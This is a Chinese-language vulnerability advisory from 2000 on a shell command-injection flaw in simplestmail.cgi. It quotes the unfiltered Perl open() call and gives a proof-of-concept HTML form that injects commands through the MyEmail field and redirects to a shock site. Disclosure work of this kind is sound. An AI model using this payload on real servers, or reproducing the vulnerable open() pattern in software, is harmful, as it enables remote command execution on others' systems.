simplestmail.cgi 可远程执行命令
发布日期:2000-12-14
更新日期:2000-12-14
受影响系统:
Leif M. Wright simplestmail.cgi 1.0 for unix
描述:
Leif M. Wright(
http://www.conservatives.net/atheist/scripts/index.html?Download&simplestmail)编写的simplestmail.cgi是一个用来处理来自web表单的
email回应的工具,它对输入进行合法性检查时存在一个漏洞。
由于在调用open( )函数时未能正确地从用户提供的输入中过滤掉shell元字符,结果攻击者可
以使该脚本以web服务器的权限执行任意shell命令。
有问题的代码如下:
$youremail = $contents_by_name{'MyEmail'};
open (MAIL, "|$mailprog $youremail") || die "Can't open $mailprog!\n";
<*来源:rpc (
h@ckz.org) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<form action="http://someplace/cgi-bin/simplestmail.cgi" method=POST>
Command: <input type=text name=MyEmail value=";">
<input type=hidden name=redirect value="http://goatse.cx">
<input type=submit name=submit value="run">
</form>
</html>
建议:
临时解决办法:
NSFOCUS建议您自行修改该CGI脚本,增加对shell命令和元字符的过滤。
厂商补丁:
暂无。
浏览次数:5429
严重程度:0(网友投票)